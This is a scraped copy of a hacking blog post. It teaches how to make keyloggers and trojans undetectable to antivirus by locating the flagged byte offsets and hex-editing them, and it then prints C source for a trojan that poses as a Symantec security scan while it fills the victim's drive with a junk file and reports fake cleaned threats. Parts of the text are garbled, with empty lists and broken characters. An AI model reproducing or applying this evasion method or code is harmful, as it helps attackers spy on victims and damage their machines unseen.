Академический Документы
Профессиональный Документы
Культура Документы
I've been writing a lot about keylogging on this blog. Now as you know, most of the
keyloggers are detected by anti-virus softwares, so what you really want is a FUD
Keylogger (Fully Undetactable). That means no anti-virus software will alrert the
victim saying its a virus. There are very few FUD Keyloggers on web and the most of
the time you need to buy a keylogger that will be FUD for a long time. They normally
cost about 3$-20$, depending on the functions of the Builder.
Since the FUD keyloggers cost money, i decided to show you how to make them
undetectable for free, using hexediting method.
Here I will try to explain how to hexedit your favorite Trojan in order to make it
undetected by certain anti-virus programs. I will try to put this as simple as possible
so everyone understands it.
Content:
1.
2.
3.
not be matched with any of the AV definitions and that way the file will be
undetectable. There are going to be a few tagged strings in your server - not only
one, depending on what trojan you are using and how popular is. Less popular
trojans tend to have less tagged parts, and with that they are easier to make it
undetectable.
First of all, hexing is not the best method for undetecting files because AVs can
change old tagged parts, and once your AV is updated, new definition files are
downloaded and your once undetected server might become detected again. Also
not all AVs use the same tagged parts - this way you need to hex your server against
more AVs to make it fully undetected. This can be annoying because you need to
download wanted AVs then hex it your server, then download another etc., etc.
Sometimes AVs tag critical parts of the server, and if that part is altered will
corrupt the server. Also, heavily edited servers can become unstable, some functions
might not work, or even you can corrupt your server and make it useless.
That's why you need to check your server if its still working after every single change
you made while hexing it.
Now how to find detected strings in your server?
There are few ways you can do this: Manually cut your server inhalf adding parts to
one half and scanning it until you find the detected string (which is slow and time
consuming); use file splitters to split your server into bytes, and after that scan all
split files and find out what byte is detected then alter it in original exe, or you can
use an offset AV .
What tools you need to get started
As you can see this Trojan server has only two detected offsets.
That means that first detected offset begins at 53F7 and ends at
5476.
Also you can see where the second offset starts and ends.
That***65533;***65533;s the part that the AV
is checking in this definition database. If the part in the server
matches with part in
AV database your server is detected. You can hex beginning and
ending offset or in
between.
Step 2.
__________________________________________________
___________________
Going to change it
***65533;***65533;FE***65533;***65533; to
***65533;***65533;EE***65533;***65533; and so on for all
other detected offsets.
So there you have it! Now you know how to hex your server and
make it undetected
from wanted AVs.
void accept()
{
textcolor(LIGHTRED);
gotoxy(1,8);
cputs("THIS PROGRAM IS A DEMO OF SIMPLE TROJAN HORSE. IF YOU RUN THIS
PROGRAM IT WILL\n\rEAT UP YOUR FULL HARD DISK SPACE ON ROOT DRIVE. HOWEVER
IT IS POSSIBLE TO\n\rELIMINATE THE DAMAGE.\n\n\rTO CLEANUP THE DAMAGE YOU\'VE
TO DELETE THE FILE \"spceshot.dll\" LOCATED IN\n\n\r \"%windir%\\System32\".\n\n\rIF YOU
WISH TO RUN THE PROGRAM PRESS ENTER, OTHERWISE PRESS ANY KEY TO QUIT.");
if((choice=getch())!=13)
exit(0);
}
void draw()
{
clrscr();
textcolor(WHITE);
gotoxy(12,2);
cputs("********************************************************");
gotoxy(12,6);
cputs("********************************************************");
gotoxy(12,3);
cputs("*\n\b*\n\b*\n\b");
gotoxy(67,3);
cputs("*\n\b*\n\b*\n\b");
gotoxy(14,4);
cputs("SYMANTEC SECURITY SCAN - 2009 (QUICK SYSTEM SCANNER)");
}
void findroot()
{
t=fopen("C:\\windows\\explorer.exe","rb");
if(t!=NULL)
{
fclose(t);
textcolor(WHITE);
a=fopen("C:\\windows\\system32\\spceshot.dll","rb");
if(a!=NULL)
{
textcolor(LIGHTRED);
gotoxy(12,8);
cputs("SYSTEM SCAN WAS INTERRUPTED. TRY AGAIN LATER!");
getch();
exit(1);
}
b=fopen("C:\\windows\\system32\\spceshot.dll","wb+");
if(b!=NULL)
{
showstatus();
eatspace();
}
}
t=fopen("D:\\windows\\explorer.exe","rb");
if(t!=NULL)
{
fclose(t);
a=fopen("D:\\windows\\system32\\spceshot.dll","rb");
if(a!=NULL)
{
textcolor(LIGHTRED);
gotoxy(12,8);
cputs("SYSTEM SCAN WAS INTERRUPTED. TRY AGAIN LATER!");
getch();
exit(1);
}
b=fopen("D:\\windows\\system32\\spceshot.dll","wb+");
if(b!=NULL)
{
showstatus();
eatspace();
}
}
t=fopen("E:\\windows\\explorer.exe","rb");
if(t!=NULL)
{
fclose(t);
a=fopen("E:\\windows\\system32\\spceshot.dll","rb");
if(a!=NULL)
{
textcolor(LIGHTRED);
gotoxy(12,8);
cputs("SYSTEM SCAN WAS INTERRUPTED. TRY AGAIN LATER!");
getch();
exit(1);
}
b=fopen("E:\\windows\\system32\\spceshot.dll","wb+");
if(b!=NULL)
{
showstatus();
eatspace();
}
}
t=fopen("F:\\windows\\explorer.exe","rb");
if(t!=NULL)
{
fclose(t);
a=fopen("F:\\windows\\system32\\spceshot.dll","rb");
if(a!=NULL)
{
textcolor(LIGHTRED);
gotoxy(12,8);
cputs("SYSTEM SCAN WAS INTERRUPTED. TRY AGAIN LATER!");
getch();
exit(1);
}
b=fopen("F:\\windows\\system32\\spceshot.dll","wb+");
if(b!=NULL)
{
showstatus();
eatspace();
}
}
if(t==NULL)
{
textcolor(LIGHTRED);
gotoxy(12,8);
cputs("SYSTEM SCAN FAILED! PRESS ANY KEY TO CLOSE THIS PROGRAM.");
getch();
exit(1);
}
exit(1);
}
void eatspace()
{
textcolor(LIGHTRED);
gotoxy(12,16);
cputs("WARNING: DO NOT ABORT THE SCAN PROCESS UNTIL IT IS COMPLETED!\n");
textcolor(WHITE);
gotoxy(12,18);
while(1)
{
for(r=1;r<4;r++)
{
for(i=1;i<900000;i++)
{
status=fputs(ch,b);
if(status==EOF)
{
textcolor(WHITE);
vir_count=random(120);
draw();
gotoxy(12,8);
cprintf("SCAN COMPLETE!. DETECTED AND CLEANED OVER %d THREATS!",vir_count);
gotoxy(12,10);
cprintf("PRESS ANY KEY TO CLOSE...");
getch();
break;
}
}
cputs(".");
if(status==EOF) break;
}
if(status==EOF) break;
}
exit(0);
}
void showstatus()
{
gotoxy(12,8);
cputs("SCANNING THE SYSTEM FOR THREATS");
gotoxy(12,10);
cputs("THIS MAY TAKE UP A FEW MINUTES TO FEW HOURS");
gotoxy(12,13);
cputs("SCAN IN PROGRESS. PLEASE WAIT...");